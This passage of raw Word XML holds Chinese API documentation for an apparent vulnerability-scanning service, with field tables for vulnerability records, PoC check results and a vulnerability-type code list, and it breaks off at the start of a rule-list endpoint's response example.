        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CC6940B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="692A6CE5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否存在exp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3D578996" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="758059D9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>kernel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5803D7C9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="267A20E6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="364CDA18" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否内核漏洞（仅linux）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5CBC3B12" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6246022D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>localEscalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32CE6B83" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33FF6166" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6748539A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否本地提权（仅linux）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="047C5C48" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C33129B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>remote</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E5DA1D3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3915C324" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12EC0B5B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否远程执行（仅linux）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3359466B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31ECEECE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hasPoc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69921499" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="242D2187" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="726BF9C1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>存在poc（仅linux）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3CAB2DE1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02EF4088" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cvssScore</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F8B43BA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CB1F165" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>float</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21866A5D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Cvss分</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="13A79625" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E0BDE25" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cvss</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7855D6E7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1022553B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(64)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="102C6EE9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Cvss详情</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4F21E82D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F37D772" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>refs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C50E743" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06C4CDAF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>mediumblob</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47136BF8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Cve引用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3BCADBB8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62D4F371" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>expRefs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E8C21E0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00FC5077" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6AA7A0A5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>参考链接</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2F4BB3A4" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="705BF7DC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>pocRefs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1340A0D8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="316743EE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61A5C38C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Poc参考链接（仅linux）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="598311CD" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="063775FF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cves</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18B65BD4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26EDA397" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05A9ADF4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>CVE编号</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="39327AE8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="144ECD1A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E1F19F1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A32EE91" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0EF71D7A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>漏洞类型:0 SQL注入,1 未授权访问,2 敏感信息泄露,3 XML外部实体注入,4 跨站脚本攻击,5 不安全的反序列,6 客户端请求伪造,7 服务端请求伪造,8 命令执行,9 代码执行,10 任意文件上传,11 任意文件读取,12 拒绝服务攻击,13 目录遍历,14 恶意后门,15 本地提权,16 注入漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="24943637" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60A1E8DA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>condition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E6ED37B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CB3D8D2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinytext</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A91C089" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>利用条件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3D126192" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64F0ABC7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>appVersion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FFADC49" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55E1EB68" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(255)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5710DD9B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>受影响应用版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="092C648A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0535E4DA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>pocCheckResults</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F992541" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3137394F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E9E4791" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>POC检测结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0719B3F7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回部分说明：</w:t>
      </w:r>
      <w:r>
        <w:t>rows中pocCheckResults</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1409"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="3540"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="26D6CEB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019B631" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="756F36C3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4694C330" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5410E2BA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1EB2521C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19C41CF7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>executeType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13980035" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="494CA7E0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CD1262D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>检测方式，1：版本比对 2：POC检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2521C485" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A04B3C5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>checkResult</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61715DDD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="552AC432" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64B594FE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>检测结果描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1B7CD98B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="117" w:name="查询所有可用检测项"/>
      <w:bookmarkEnd w:id="116"/>
      <w:r>
        <w:t>查询所有可用检测项</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB257F4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口提供Linux/Windows漏洞作业检测项查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E4F6CC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DCAAB4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/vul/poc/job/rule_list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8D96E1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/vul/poc/job/win/rule_list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE20742" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293D60CB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B7224A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AB42DB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/vul/poc/job/rule_list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63309A75" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA25E9B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
